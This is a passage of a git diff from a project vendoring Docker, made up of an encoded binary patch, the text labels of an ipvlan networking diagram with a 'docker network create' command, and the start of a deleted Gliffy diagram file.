zB|`lf3d;R$sPp%6>)a0*^ngtwg*NIi3KA{J4B||mL4-1puMng1JxKL(fVHc34DX*n z$GN^|;Y&9sgHA+;==1OdA9bj879%e!v#`T}*Y}NN%|r=!#L|g;Fs26;L82C|Cajit 
zRyHwNo;V|V;drzYKZ6;1f-QgFA_$;vTvnDT1l_U}#f@x47rwW^oEo)$P5ogQUi1B(|g0`n?TBSX{|gNu|)%Tz)QCSI{btITmE5X zNJYEcoVGIdrxZV+3Q!)X3`=`{dEO=?rBf>?%E4V>a6Ko+8Q(Ehs-3|UsW2|LwY z+ud(#h@OLgnDwq)Eh9VIH_-+@=cg?)vhTqZfZ&O$WOrJU|rz+4cMZ+(EHf1j|RUrYkwMbbK@;q_D?O0qC2uIm({e-I z8Prm-->~Qq|HP9=?zdH`wQB(L%j2k&?KJRsCxEXwunnL_6PvKP~^+s z<&JOFVhBJhSqz^b7&WD#NSrR&MVv3O8~oHrJbjrXzJwAg*4_ET`TVUoJ^ikQjL{Xe z-=sBrf4LS2v3wi0yuHo6hj_#qMRXfTAOI ze{9uYtqWbo{thk+^c)|}@Po(6y8YSRB+y{)=V7TaS&R&4*F8cy_%1@N^=(e*U(-$? z3?!%Y1~uN?g)IV5b{jGs9sc|2dHu1YQm9%BCMlWo<$WExAKkf?I+RS&iUIm{3O#EK zEu`=PP8HK%HGMLXD;bI+(KWnv)qXt%-ta;fv$DFD+$YNxdAN<|(kIJaV_WS+13kS|OHuZHDuqsV&rZti zUC4?bAHu=keS>z6VY;2p2m&XfvjA*E`;9KVeQxFmagN6l(U{T^Yo%hId!GuUa<5a( zKPX0X@MV%47lw9uad*W|r@m-`{|G#P9W26`izdRAr`AHA*v3j1r5OCgxr`LJ4MT|k zj4m`@Dz8*9m+owX19@VE>8dLS5daXSA%mqb#i2xcg3%&X(;4rn(=4juVbn(M`Ac!4 zW)IBabKS1NDvIV>*k8^Mm%!{8AWDL|=?UO6&BN0l?&sKhk3f!D>DvWlFBf*=xOF)* z2@cX7J^$vdnUS?XYe$2n7AXREUHE*A?#iK>f((Gr7@K)8Sa#|VW-K}qpd=1~C)knR z`5gjXOlRNJ|z{xF1@TC!z z3@>;Tnqyqf8cqhVntIkzbKfy$56 zU2=7{wMW01Y&g5H*3ZL$kUfu!2AeS&)CguhTh@1&?Bh!oabyfQL*4o2(_MPuQ{LV= zJPhY!>4H5oQ8E(!#5FgBH^4ubK>RqsF8^#&HvQwhRnft(#0Mv?9n|xKCgI1SFH602 z5uNdVl_7?Ly6rHeSt40E+YcE$OtSthv8%?maN&iQ9@Jo=T&gN!Tuh)STa6r4xSm(v zZwEiOaD42XeYh*Evi6&DpJfo4A7BL@0T{k;5#&_y&{jrgt$F@PXUQait4|7=NGqWr zZZb|OWde0>UmILF8dqDNsuvVWNPRXVCc0TaU;NbAh~}GnIeY5Pm@JOyWbvbu6|C7u z?lbg9IfZbu@3RA+h8ZhJ9mrw-S1aGe3|9e!it+SxhjfY>U-eqB(J*|H>+GfIU@R@oDe;$GFfr7B9f*qPUV;w0wJ!K2l4 zL+-mP_AThKY}3b--xlc+*k)zhw$WQgEU5uUKjyQ1Kd}8;K^)zRv3)kIxS;OP3b?tx zmQV6<2m^^#S5{VbbdZQOdVj0z=?Rka5sm=h@i_5k-)(<~3m55nG1GA}LcpxobsQ|> za=8E0Q%HQQ|2TNJTadKBAU#bP&g8J1SeO;zrDx*YJ)4dJgkt$qL?98@-V`fywjh{w zBwX&kEHmfuE3U7qa~8&n!Qh%Dw9+K)S+A)6o+yBMp@6rW_$A!C8>W#jL;TU+zPzjq zDNOQFuPizy=Hf_ENojn1{6dMDnK_}xcwu3|>HUU{)_VC3;;j8w%gGO1z?Y{$0l~&_ z#K1HFOsEf1jJpA7`&imyiA@azrS|;gHabV5SV#S}5guvgs~@}DeY>p~I%QtZvP@~z zi)m?8s8Ptx&5e*evkY{V;IT4Y0BDvKB3O|dP>Na#r>>iw`EKA9f-_l0%=^;e(eRZ) zyg?Ci*ApjlmrH&U^!c&w?r6>iQBg?awNMRPA-k6>6!2H^gFr}v6~yYXSp(yqS&SKLpp4OR~pXGlE_ 
zU`GQP#!S18EqK(-@A5PADxELAUL}%+Ly0!))v7)6QHks2X5SMl8<)Bszh0%V2Z z;BC0huqcb&C-Py48><`jO2tEQn5Ua}^p!TfrkKnOs_;ngt!<5jejKx-+QQapMFJ&1 zbNSZ2gRsD?gvy>Ql>J8@#)FoJed*f4y>@Q!s?b`DvIz*}Dkqsuv^8*I@9ZB2T= zAb$NWBEB-#D-oLX-%JMi{+Ddbu9&1GbyJlxx1 z$YD4LfWX=M*$k>D`@s>q};wwm3lwVnpv|ublV+h!=f&V0w?V~cLakqc_$8RwGp;IL=-RF=K z!NAqiqcbuLEf^&a{i{2vkeOq*Tsd*rP{OB)7@odm@@}%w+9)9I;;hmAplO7ENj{QW z;6DvW0!WT7QknJoaG~6=x;TPafUk#sm3y(?mwQpmWd+_C{^5nDJy*yzUjU%>2h)(~ z*Kh1S4EZoM90XwM3vL0|ou>rmGG?ET zgX|!bKwsE4S&$YCY^UATu&W*qP#s6+)a0KT9yMSfnmV}r-lwEFoDCP!Z$M-IYo~=U z8fGZ+!k>F{4*iN;KK`^LfH#Yw>cd~Zy$f7X`qwhvij1sXj7}3@wyyA|S`|&7K`b(& zxAVXZb;x}yc&3k7FG;=SFKn+b;GX#iHlR!Mb<(d(w-ltOf#99%8z26EXvGBb8t~te zygyMBv7J)+z54NBrDqA_kBxI6*606e^AGNCRoDNjuX_hk9FXNMe?+Fo!ue-Ph)X2E zh!^W$FZWnU@53-4&O08qkbfO{`_TCI@d20869L$?f+|MATFsrI{`cXjhzaymVS8D> zr9WQze(CSI$CrOrIYph}=KjS0&F}hc)Wd&F|4b;%_`M>l6DPhEn6E|+L zN@t|Jz;X@%ErOVseoV8I`e*Dn*5Q!p8 zJ}36X%CP>2Xpcsc(?w4UtS4ze{6Lp&_jA$X=p*BYb6AMOQU|(lEMwJj5W}%TiQWHT z)w6&M6iN6=UEIVDJhoVNQr4`|*Ono`Q|R9bo+#k=cDuuv<;9zyrvI#+tR3E0BVWvH z%dT_lGJg}S_qDA=@k76|Vxh1AlPrJ6k}s)%M!ohCM)Xxh$@ekabu{OR)!KRk!?|jt z8aRxF$41X5TPih=n1_GaY=6yYtgV{Uf&V+{4P*ZI+TU$9oO4#;nUeP3?Sxtmf3{{@ z&>^7e$7gI)CsI1ZXAGjWKuKk!@!D4h^kH{|9$q&HBt8hm4n3u<4s?ohe_=H6bc_aB zevAb4dM@=pylfrh(sNV)BeXtThE|Z)=32VDF7_BMbkHy=`fqU{W6ZM8`*BNW4!i_u zEk(LhK5d=t_F`;eH!$EVUjqLG4Cvm>)cKRw8CBuM!RG6)k>ks|p=<(zC;xdvu^_DW zFL{cSf!ffrn0taGV9##G73eaHR%qiSS!=UeO#fv0am}Et7aB{;bJ6UrA(8LLd(&{9 zK)aP7WLT`L#vLA7F>>d8D^XAW4`{)^YEOA+A;(%7$$dS zZQJwMI!iaVB6Xy>zC)JB<6`?HsA2Y~38QJ)3&WmTE#+anjCS2E;_+ImC^n_=1)h4ZpPV`CxkusY!ON})B=qUH=k+r!BXxp}C> zrkyKz1oukDrpyGd6%NBCxAI18pR-9}K5?$_P!6q`wGhf%0;7$cS2eK&6d-4e!Eu-A zk>n(XBmw7KLK$m~@|0Z5EVN^Hzv0Jhdcl2WQZ#HAuhuF)t(RQgpL}N_&+fb^^ceT??2-7<1H*5jSQ~#&KD4C5{$G= zOvfmmYmL*=Y>G$@dW&XRe%X(Tr?V(4`Qg12wS$S+vr-bXx7c*%JW?U`Jy=W)9*;w{7$2 zT;rd3&aqgp?X-P$=Hu2h=prcY9F27Z$kbDFP6{8=3Xgw6ZPwDYv?Wdp|3$FmOU|hc z7KdHdy7#w0^v-MFpaCDpf-4#S>Aq*ki#VP0-GQ74fxD-O6(_kQ?&m;UXrn(o 
zCUE&Xn;CJ*ik(a@iUuW8UHwf83FWmFLGDS{;@0r8HB$82C8)HuIFb3Hp*5;5Ik96T10b` zb2&BzJo;l%NOnCeh|qw5RW-jZLfMOLE5n~P)zv2@(LMaF94+WNVeJ-69Cu$Ev{;fh zsYjfCnowV@Ob`*1GM33*IJSTbjW6Pf04`SaNSqrmuIG4Qj%znm3R{))PhSWRQ_ZF4 zvll{b)YoSQg+jscrQn^()>581-UU_{sp&XlK+s=l*}3^(=7nqC6B}u)tmng`;*<+n z_-N~_&oYlR!J0pt>G7gloP0Z;;p4($=a=hAQkK7dh_zJ;EYX;jGTn#dOV`^;*Ad|o zlG4L_umIG2wCu;izsB%VF~;yLXM=qEBV%Pz`S z=g59bi!L;7w<5z}mclTkS%e4q@14v}eCr4WJK+i0akU^DT{@0)XP9(IxN<3T>7UNm zCav!keM_a&3b_KN>5;cu*@}Q*VCCpemqNjby1Ke0B_(~h`v(UCK`)(Bg#qv+rBIh! zmFEqphtk2#bDo~Y`r}zVRnNlpSdCIME|f!hm<~-+Jk@a}H#-|u%k1uSjWAY_wop9c zgbn}*FWp6kZ8kJC{O)m}`4!N>k`Nas@b)IX#`?{(7QI+rs~!@pry&1wNq15zuVllrgDT(P*7rGViL$jB*pruuz<_K z0PmisOiXnin)?MkQ=)JVKE8+zao#MM@pRgQ=es|zrKP7O&F*`utB)7M6bZ4hvGMU1 z(FOV}oI|8PyxwjBwPL@nqLr-N_2{~YF1F?To;5-*FMPZ^Q&Uz(MMceT_7<}(aCf^u zH+Plz<$29W`s20$=60K<*0H*2@)2gg)wILwWP3E(@Amj0(5)|a>tbtoRtqMI^oMRK zOgT;H#Zwpx0Xn(xV%JTR_u218+v(rk0V{8l%V*Vec%M+FG{cQB(|!JOOuvYTUU9eM%@NtStWi59a9L*_U#y(wTk= zVq(S8xvs7*LTCA;>xpSHQqoYj0k$`+Vaj#P4^BtE&{R(yp8e^eK*LA|nhn3*wK}hT zx6Y)q!Q@>;rx5k$=i-8s1*5O`aVaxwelRq(vjxou)@8&f3Us}LQ%+q?Hs^iGs4$aa zVB>L$+tF$m%J#zgFhvn?t>HZfU}U$iJrYbq&T)~}j~&>${OcbSB<4#r`52X|B>j%R znD-k@g32sVE93hq_#;OIMGZd{5$Q@5O>&HQ zXQFmLg(XiaKLu8j&pb1pW^Y^>oPnX>7>XNYI3T02dH0|NM?Sd-7WgsOxfo|BUP*a^ zBjOuV5ALp`!Ny5+`21R^*U7Ty@gfJe@JdUoAr#w};~Whx`IIiy8a>vR^vCOx(Bq$y z8m{=gS_9L$yY!RRCs9T*CoOt|PAw_iIks}Q+})fbPp%f`ZgY>^pZH7ng!fK- zx=Ycjz*gKXS8iBjCOwU*c#>3bDk1qFgH@_;KP9EZ35O;9(Pj%JXVL?GA(r9tVM0;R za5aZTmlt$vV!%hIB#j$3``A&QGfgwAPj;bS90*qxaa$h6{_rDg(4R>)v+QheLY_E+Ka_ z-6snacjq5DjabrSK6mQE+iU+BGsdcuSEa>H!iGIf&| zVpmg-+ohv(!SUjtG4T-JPa>kb;aXDTE?=FK*M56aZV48ALB@%Uex+TWH0*Niu~4oW zE9M!ll(ArCUrzjT4aU+Ke@$hKOVS9xSyollOVI&!)3Kp}@#rpo+={8+wHGCPvT7{f ziWU+YzG;?Z(hFv^GF$VL`>1wgMP}+kl^z$5IwQ9gd6lq4ElVh!3!=YW?uqWIR1P-e( zb)gatU4<;f>yivtJ8oxX$nXPGIl-Fnt)@fk_Qh*&>x?BCZmc6*e&L zvn(^Zw1BqSet$}g zt*LS4?z@3gcXqX;1IOalflV2z{VA@zV0q$huVbnVb3w-5V-+>SX7 zoSflMeMmetKwEl!)5L+0Uw9fFH*gq}`JeJlSUgB{;#lZV8^|0&-ME)EW5O55YC`yU 
zrT54aHU)3xU|Sx-BO>tpAk~+R|ZI!X-W= z^ms^J!H)EUq!h%=GYApE@S_IU>r7JN_&V#k?>iffLNkL3Qld5wx)zHgw}(@Hbm6M* zDt_}n**q&ANsPL^mDbEmOCf^9>OfZTN#QJkhD2pcVHQT{6y&#iQJ)~87{ozoMaFAV zDE$e*T#Vpt^WCi6TpJLG0->Nb(My1MopnZt3l@|4`X&sK`dK8OEm+Cp#2Uah`AMW- z{ltLZAOZo=dE5A!7b)fBj3N>(JhYbHH-_xEj zN6TjP7-^jmqS7?CGg%HVtNL^4P#VCnlWzn-^Lk=l$A6z=4j^45p4T~3+I`9+`Lv6&q~9~b_$*mQ(C}9|#gX4wiJwgPo*+dTayt5UI(TBJ$+Cs~|9X15|%tnViju(nQj?B<662bBTB=}y08IzTJz>OZ{ zC2({rJG8g2!VH6@1lRRL{kJaJyEa|%z5}q}ps~2gz`_rCF&+8P`=vpnj02dRf{-f* zAWVPv@u#MWFrGI$auVGqhsaj*Afsk&;mFCk6Nfp7bhmxgU7k?f&5-h(shpAJRBUPF z!n{VBk#T)rNc%mQ(xBrD7wNRNJNos{Prguh@{Q4h_1+$J<#t_hlkH{WBK+BnqYm&F ztEmeGwHO?Y~_7q$H%TR(T>v#Z!!=cDEr~*dAhej`#KPXbG+U7ce)1F0Wpk% z#MJL%Q--q<1%?f5iW6es)zSf}Wc1!wrul=8Lt7kgc+y$wF+9F*%lM?_pYL=&$l<@(Jjj(eKT3F9X?J*6ewX-py#=Jj=R zRoB3|4!1=*$7g3!bfmToCHH8EU|zR)vuYp-O^6A?sSp9)7cDfN(vaXFh(TAr=K>pG z{un#VO8zO%8-Y%j)7#Pg!%UYhIL=%3F)QhJ(Cw1#wz1)+86ED&F7?L0*Fa)iBbY#Q z0=mBEg7f!CVF*dp#GQ&%1IA*lR-(}sfmkjlC<2sCoiK8hmNQ|x;8Ee;{vbmNR!LF()|Q{2H#_Z2_Yr%IC!-mQeT5^&)h1kVxk$D14MjjG%5 zD|JkP)&V1EJ|Mu^csd)~N*cUel8v1quPe6$HF_Lg*%Sbm4(!10x@%zbM>?LKuxOPG za)`l>#Paa$?h;7oZOWg&(fO>i2tUhm)o;R&{!sb07Hc?m$@ikH|kfCWHU*tE$) z(Z1gw@{OZ>Ru@9Zu?3nHT*uP7qkbm|#ULDl)YJh&Q3;b>){z&-;?C6d^kMJm(ON?x zFB=^7+wl;15wcx2{hf36edl#1i#3G!WKuX}-{n&T*uGCz9@o%;WD+yrgmFGxHO$@O z+}}Z++mB!OP2kERCjPqZ>BABZxB;jrr<26pWzK7ZUR$fJ52_FOUhN&+QqGGrz)U|m z?AVyaV=+Ts$=HLWM0Zxh(JX<@Rf3-nGFnT6UZy4vrF@be8V=Q8GQ4dPbwp7Lkvth> zJm)5+G>giI&LJ^k^;6HsYFbHo^lYEcf2dV6(jGTbMyp3?YPafBW#b#Q!nW9*7Msi1 zd&Mt9L74E0uLO`yL8xZkwvhWSsulJVhA#Jm(^(Kzvgz@t=*8vzTrFvk^B+=$03WZj zRV^d>MBBTm2c}5s`2yU9Xh(=4T7frJ6VfLy$Ci+BtQdTU3 zd5l&taN}ZRG2w%1x92AITl1^?!BSp|fRA%u_!5E+EB|Lp%ni+E!0%0xi;}t+RGiD7 zzM`~SCP}>2?eKYF%NCiZ#2`R}{&q)wSIp{Asy>C$kZO}yMLs^^;#GzKbS7(k36!uf06Z#|e zx*tAU%1811d|yg?vlD08PR~m&Vb{?O`WG9`)JFNb>-`xHoJ$#1dh#AmT5pVvS0`e8 z>ITWWXd_kNEvsRCPku)X1vCz>><^yk41wTBFa|~A9uTMi zGU*kw3ArXIqqp_#5x){d+Yk1qFh0@VSj$}sC+k}c&tCnz(%Zyl+>H!4t&;l-v^QbC zuFL~^61eSn)YEj;n4T$AMMx<)t19B@yDtn=DE 
z%d$cD$+cFO%Ok5&N3t2i|DZg6WO(;4Z1R8zUarsw+Gl|DCZ^F!6Ku917=nRUrDaQC;((|5bk3#EuDg(C8dM8zi#N?!^DD*J zl8^t#L-=KQk)_=!qeF097**xENI4nB-Hrk&-+2EcV;|mD$>718qhD&d!sVi^%Z;`e zG->sKZb)9jCZ&4z41z82_sbDph9hBScaTc3ZkzSzw6`LH{Bs@7xCLDQO%m)8o1RsJ zb5OG+`3JFuX&5Ys8_5YA#4=lqhulntMDjTMpJWudYSN1Q&zLa5VGdCzO(VnNW zSaxrcLSi)I@azIDV_5_V5eU<Vxka##r?>5(^|}#>ROKt{QnCU z#DwD6gpTc4zz+kj!7D{9vADZx**ku@&1Dh^vau4`aBsh2fM1-u+iJnet#27HXt0=yjrZf_2bdD{3u0wb1 ztk`VS+>C=nKm@mGQN$~|q%BT9IpW2_ma-laOSD1cW5eAtMxF~NX`&b=y?39O5!V)yk*YUvpXP;-ot zp3XYt^|@o@^!JC(;w8$X7uU!_Z=qk~1gPZ_p6SY63< z-Z5cBjpCHm^%bGrd+%^>m%+Ey)TNbp+o(t3zs8x?f#xPncu37YNd~SIgFY{F$8W22 zn^@u9pNUw1c~;Dzdg*pQQ$76{{X5R@-U$9#HuGkriW#`A~*vshU#7Z zbX?V($VC4>nR04uLJ&LfcFwx^-=S1yC`I^&Pp_{2#NRj@w>_V9;u9fSNUga6heP+mrf=TB-R7JO=w;_ zzhdVV@Tl{l`|E@v3Cb6ExgFu)!Jyi|OIFapuhNF#6S5o(-b!p*-wyr3Tyio({~$l} zCz;NR(U(s$EppiT?MsvYrl-}?CGz-ZDaMC3b5zLNM5r=nx8v2iA;wK^*>I+KRKe() zWhSc+azN zyPPrUXx~AJsk34(T885e&2hgYseccc`*+-?2Fs#S0gLlUqdpWCf|boccW!7GQ1_U z1hr32NThsRGG|^}I9g3ZV`!FqLnZ&=MGDWXc*bqPGU>~RG@&tG{`9m5j5X}-$;xnR zmnNj+^|Q9sFA?5$3zKMy`n*BVzZ5X97##Ra_#bP$Y3}qPuP6F=Sq?)Vt-(CIC#KN5 z(x3Za=uloqyq%ZFXC%?{ssH{aK~3Y@`6R#R zc2?ovyuPvGP5Yu|rRO4gj#eo#R1@Hs^j3a%b`{^LD8YSpL5a1YQWfnB1zrI5^1aRgrX1`-0#0 z@?^eE6Xy1xNP27H6A|AoYiVf-R{@9*dAE)G7C(U(6IfqN9@gP6?&3Tx)8$M{_t#kc z_+1c1>W}{0E_+58F~{^6s>XFT*GEU1VgdYWvmGYU{#7ak&gr7u8~kCQpQaqsE#~pGnDU-zx%p2coe&^WxpC^{J8yg>iUcB z%7KQjsT?Bqdlr`&9xqW?QAb=F-~Fo>p?tUcAn#FZ%zHfHa75l%zM}?u=B`eQLBl``W8T#~K}l2*i);+X6tjk1od`E<Y=KV3#P-k7eqGT4vqwhBlo65 ztTaME%Y#Jh8FkdQJSCx#Hr{%JIXeBPR7JPYBK2Jl#-%6PY5G~ph}q1Wt?czkwS`X{ zyc6%}J&qC-5yAmc{s#k1o`37J4Xe|z&0j{^Wbsn}T(zBQ-+Ay@YOPaH42kKAZQ&~o zB;#$xe&4N1i)V@I25-gNut0?(nZyyoHsN*cK3%6vsLeQdDv^v`n3=ihh{qwe2X-y+ z|FzN;nV|12mLS?6gb7Nm;H%};AHZnUJYw6~Ak#~YsV!^wU)p9i(c;2-41MTa>HF@U zb|^cRS!3_pl~O{)sndA!Gs>b5d+xKweeuF;Mp*FzY9WX{^~bLnFzN&Eyo??MJ1CIW z)+_Lb4_dgOBTwXzsqGPs-Rn1hlBQSq#x(L?H}XiEh<^&NuH^7bVU_2$c%Lf=rdmp3Ika3ZNCpvIcWJ>I;p2pp4KJ*Y$bb5iMrlIp-YpUQ-XPY< 
zVsD;u#DWo`$DmhnSi+;|o5sRgY-d$gVu&8I6~imjCdd2~-T-1k59YaGA&iaHIi)8SWJp6&U?3zxQ1yobk<|N-nQ1@dcLG>1g#7Lk$$dV7a4riS zs>4Lzu_K-6tmmAPPXBEKlk0x^yd4W-isCyB$!GCO@vaYg+0aDT@fI)NvHW!XA7(0O zL!G1qYjm@LGk1*sHw$`UO3h00EEth@TUG(p5`PLNevikg7>4$TVq+^&&`#BYx^9O}}Dq{44aJB916HfW>L&MNk!s)l$m9J4V|-Yjd2Usct1c*rDSyF z8J#b$#-xF7lKcFs$@;E6d{7&ZWkLp|c*1^iFZew;q;1E8r39VGtvpq1!O;q59g-EM_5M5wJ&jy95n3e11Bjc+k%xM~pQm4C;D9XpYL z^zkQhvUO1=+S^a~@*MMXU(6^8QQ_}bWszEHHs2mlU?DB$hnTbZNvl_Y^{5tmf_kW7 z7>PD>P|{RpgiOT=f`4xi$L>O{N~$sp?L&)Phg>H%Xj+-b>4(QIgl*oh9FvxZmlx=I z?Uki9PNg&Gs%X*JS7fAzIUEVc6U@EnG7n{XI+SSSojGM>U>dA9yO$6a4*Qq)&8XB> z$9LT%ZlUkovhbG!Uf2Z$$|El>$JtN>f#bCMWUTop5^VCCKN_#;98u-Qzf(q>r4UR1 z)mHJyRTTa0HPtjfHZt6Qf|2~O>#xC)uqyq*lkW7O&$F*$B8HKnQsSnoiO(MJPDNmW zXXV$3TkYN3qkZ^lu&f#%#gN|Is@cV|tbrAx*TBWamFItnJT*?UKUf#?q0kh{_H=*W zMvb5p%Y}uYRt_-5e|rc5DAlW+XY=FgYW5nV z>+tU`KO&)l9xAHYuw(I(rp4zVZ}y6}XE1c$hJEF$M<2&Q_O+Oso6}t`2_5js+?WD; z2r)vtP-X%_iA*!^>!RCJD-O_vypBKbr0Nk$?P00TaXSz~|=(@*#;%gqky z)Kv8hX8FEZk=v#vYx1k_F;t1kd@(keVNT3UEMf2P#U zF6jI`E?gig`BmUU)wh~r5DN}_3Up*M3WuI>+1#B_7woHJL1}Jnk*es@^USNzTNT6h z=N*c+xTK_H1voS`R2vo<8Mz#Qjg74dq@_*6QQmr8>aZ{|@;n*4lisAb2Xuq!(0CZ_ z8L6>kG~}feh>PX5aj|@XUnFyL^RNvxjD?G7i1(r%X=}EP+FUn+7js!$&YIhfY64CL z+x_xRsL06Jpg37^hzPr8pZ)Bn0j;c*=7V>`l&+-kJR5&>hr>I(3VUj_csveGTCSez z+>Hf?&@i54Kzz=u6QP4Ri(O_@9zL!|>6zhQ!8OaJDk%W&G^rh0qe!RwFTGZb6|Z){|6HO0lno z_-RWgnH#>kQU5)Ji7Uw7c6qY3>+@5cQRFwJ2K0Dw!cyeL>YX(Nr5|aggseJoPnQuW zDDtcLf^<)D=Pg+$MNK0Xi^&eIAH{5QF@yBZM-9N{0YuD#P3x*TOs;~3nh6m6$*cK& z&9K`5=9>)tP3wb6L&t9E<%yNzpm3W|7i+tg0*{Z^^801*SFx1uj}8YFwj1h(xR|yq zON-+tRS6c7#x|2wb)VLnsd>Q@*h%W$Bn^|rEM_dJI@MY?Rurq&YY3?@QR>cztxq`qR!X0xEi4w z1ZH~?=0G?)ieKqxuZV*f+I}y}$6xV0Je30Pr)gnefX97=q&%OuV%=mp1MKOt=g&RO z2u>v>)?;mT%BC)(P;@fXhB)GgTsF(7&G@ieJ^uJETKAkNks!L=(bSMeNNPk>kb7-q zeae=F{aU2IYSGMu2pM6I_Z&kq&C!k?3|$J<*npK@v>=4TXEw4 zKNc2K^j-Zy!zaxrc~Aw{e9_h3<#nD-;w&7&qRXGLZTf3mxkdLSoNw1N`tL1@3c8#oY zg3t3_PY>%}g;8+#FC)t02H^-fe#REeOti3|FnBq;+rDZ{R?qhT1-F_jwfOlv2xTZ+-Q5bkc}5Rj=YJ(kfT^WMiLmwaxlXw1X~SQaIquj6l%# 
z$*_!JtuSpLwk-+y{UxD^G+S|wX#FH@m=|OA?iNC_?F#$Skc56=*8ShUUFGT6h_%h3 zDuW+X(^+hcD`-^2oBB zED1w>$or-H8^9bPN(hqe@J4%M4Nws{27yY|*jxlrE)++tg3=2+JbzZ2Ht-15TzK2( zEq@uGva_@>V@*r=f#R=^#tFA#S;+~JCLezy#kdhPvTm=@ZAard>^n4z6qqcAIr~g_ z#zlSVwb9|mvC)lKK8gH<45w_q2$fRdOU>ZG%?fwY1k)=DIMr@iid2LJV%i*cvHJxC zeK-iiNwsjoCc9#5IWhHip{oDWoEzKd$WoG{m^-&B@+J*vHuEXhEED z?|T86vw&w*or*ZAt83}swy@B_|5L@4heN@2@iB+lyphifqZgWQiDiWG7T8 z`#xoC*(Qx8WNT!X$Yh%g4GmdJV;}n(2H8S=qxX;R`|h9TxxahQIrp63xzBT+=WO=Q zvv&xkTVy$y2nDO7>hr(8kj?NYZD5}*E(}&iqqr>BZQ{l-<4a|ZLzRzN`e|QDzCgw6 zfaMiSn!lqWoAY!Rog+XkrjUS?%ah~rWqZN{^AZWtEs-h$=E$*ep^NvYb}u!eHgLjl z{IRL(gGx$XK1gG!i_vv3rw?jw(0%yz+=9LHr{&*^N*uX82v}xIFilM3EqE#Ex_W4P z42NiqPMkynkB`8mg*LM~Cd9L8X8-v#;clUNVMJsUFLrmG$>g@t-Q(RLtt>j0 zz!E`aE|&d;%2fEwG`Y7S27mk{%Ej!}8I$ADwDz)&CvepPARixJ0j*klw1HqLiaLz* zu$|mTqo7W7AJ})o+B`9L53V0O$*IzmZ68%Dbp~8kk>pQmK-R>Fo7=$|wW=)mcnNEX z>TF#uy8Y$~Vt(ohZd9CJ)b6o**~|?SuF4B4ul}C80!~_3Ujr2*?{(!fjSjobZm&5~ zJC1vPed|ZaULhXuN^`*yK0CYn=B#1w6>oKqS+kdSOOWb9dlLjuw&-)R@h#9y)D{gU zW0NLSpF6K|)Xljy0ay}!EaWCFnNqC{*3O+N1Jeq-gekxBj6F!KmdH&0^>9H?hFgTG z!;ODkzV#q=_^Q11$Kr{;nJ>lfyp7DnmQWJ=N#oqo2t;QslVI5Ji2?o}na>QCp@T#V zE69-}5-}tT9hPod_#wgw& zDk*mX;;kBl4Sl)0bO;`w!1Fxbnt752v~PYN%)Z7$>I2P~==T<39(;w5N9(v3WIkmW zd59mlO}#Lz&mZF5o_1Saa?i;A;~6E|(~rvlZV)Bw-t^v_H)E4eu@!t>dDZS+`FE+t z_OhJ-jR9Z>_-<A32giG6D81%G&( zRCAgWi$9i+g-%x_`00^VV7b7zsW-YV`Mf#*1REgaT+!4Ryu^By*bsYkwdcq|pf!iV z7am3P(0ku(1#X-A4OHIQ%8M^b*rV=_67D2WU1vD4y8B3Z;o;8#LIj7kG+5-x&K+O3 zH8!NdfWP}KlT;&Xo@HjyAn=hiLrmu_sm$A_6N5@p#^a@7n11aWHs$hT3#-@?FCB(x zj8Fn3swk#Zk7YotnXl<$P~Is{!cRoT1jX-4l}(eC$BWIS?URCyWfF|LZ0+a#fAJ;i6MTs z2Q&}r{8_BXkVcz<19BRgENIV zybHBb4)gL)Qb>;N-i`i#D{k_u!9|eNiNu5H{mf|@1K-jqn0m z_1xEkjfz@j{&L|h$U?(v-m&(p9$rsHu892_Yc2@g($tEoe`6EoQ80uiFcnrRsHFuy z`1ekO+)nk8FdibDWB0x45%^w@{$!WtkT?5q2BTnh$-mH!+%}X~bkijH$PS0M#oC{z z==v~Ms~TwhA(`apZZqTa^2DIJDLIAx$V$KB_v~)yQX5);1Eyok`VkvmFiBqhFRpy% zQ+4Z)?GGtpYFvk_8>Ug;x0HbJex+umjl!_4SRf0HzQDKBpa9(RJ*FuoYoE3(inCc# 
z+%Knz9vYVG|FBj$8gf7a-ZB?oA0gaoJD9=T1sXeV`z^%Z8i9Q9pKNqgU9p`Ja$QY+ z2kj`#6k|MRtzno5!Xe0|Y8Wd}EsBX|!aA1; zo+O^W9QW8a#8Il?W+-QS8wfADdFkCioB-boKcPGHGDjrlkY(!|=G#L47oLntB&ad8 zdJfh%-H!`F)_%Rya`|T9Acr2w}sk15+(1H z=E^P#LrFjL-*YYN|3Fhy>)7EA|UOxZ=LwLZUJ;8NyHp6N@5M+40)g1xpq)1b#0CaR41Yb znbX*_ismgYzu4FFOfY%r63M%p>N!iTh`6uuiW@4^gZJk#F1v$8X!JDx;5x(B1aw^B ziv!@%#~}@6r?BJH8Am7P9M|}3rsl54YzxNO@cn5>3Ln`d!;SwRHE21Tk^1x~Pgs*EnrW>_iT99xEcEPiiYM8oqJ9GBrt| zbUs@Lx-}L7tKmRYcontainer1192.168.1.2/24container2192.168.1.3/24pub_net (eth0)DockerHostdockernetworkcreate -dipvlan \--subnet=192.168.1.0/24 \--gateway=192.168.1.1 \-oparent=eth0pub_neteth0192.168.1.0/24NetworkRouter192.168.1.1/24 \ No newline at end of file diff --git a/vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.gliffy b/vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.gliffy deleted file mode 100644 index eceec778b7..0000000000 --- a/vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.gliffy +++ /dev/null @@ -1 +0,0 @@ -{"contentType":"application/gliffy+json","version":"1.3","stage":{"background":"#FFFFFF","width":541,"height":352,"nodeIndex":290,"autoFit":true,"exportBorder":false,"gridOn":true,"snapToGrid":false,"drawingGuidesOn":false,"pageBreaksOn":false,"printGridOn":false,"printPaper":"LETTER","printShrinkToFit":false,"printPortrait":true,"maxWidth":5000,"maxHeight":5000,"themeData":{"uid":"com.gliffy.theme.beach_day","name":"Beach 
Day","shape":{"primary":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"#AEE4F4","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#004257"}},"secondary":{"strokeWidth":2,"strokeColor":"#CDB25E","fillColor":"#EACF81","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#332D1A"}},"tertiary":{"strokeWidth":2,"strokeColor":"#FFBE00","fillColor":"#FFF1CB","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#000000"}},"highlight":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"#00A4DA","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#ffffff"}}},"line":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"none","arrowType":2,